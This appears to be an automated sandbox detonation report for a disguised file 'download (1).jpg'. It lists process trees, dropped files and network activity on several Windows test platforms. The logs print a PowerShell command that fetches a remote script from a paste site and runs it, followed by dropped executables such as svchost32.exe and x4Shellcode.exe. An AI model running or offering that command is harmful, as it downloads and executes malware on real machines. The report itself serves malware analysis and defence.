c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

c:\windows\system32\sihost.exe

sihost.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s CDPSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\System32\InstallAgent.exe

C:\Windows\System32\InstallAgent.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell "irm rentry.co/el3rabtweakpc/raw | iex"

C:\Windows\svchost32.exe

"C:\Windows\svchost32.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\x4s.exe

"C:\Users\Admin\AppData\Local\Temp\x4s.exe"

C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE


C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6fa664e9-7bf8-4c63-8d48-ffa29244f301}

Network


Files


C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yp3owzx3.ajs.ps1


C:\Windows\svchost32.exe


C:\Users\Admin\AppData\Local\Temp\x4s.exe


C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe


Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 09:19

Reported

2024-06-15 09:22

Platform

win7-20240508-en

Max time kernel

135s

Max time network

122s

Command Line

C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Signatures

N/A

Processes

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe"

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-15 09:19

Reported

2024-06-15 09:22

Platform

win10-20240404-en

Max time kernel

134s

Max time network

138s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-15 09:19

Reported

2024-06-15 09:21

Platform

win10v2004-20240508-en

Max time kernel

92s

Max time network

51s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Network

Files

N/A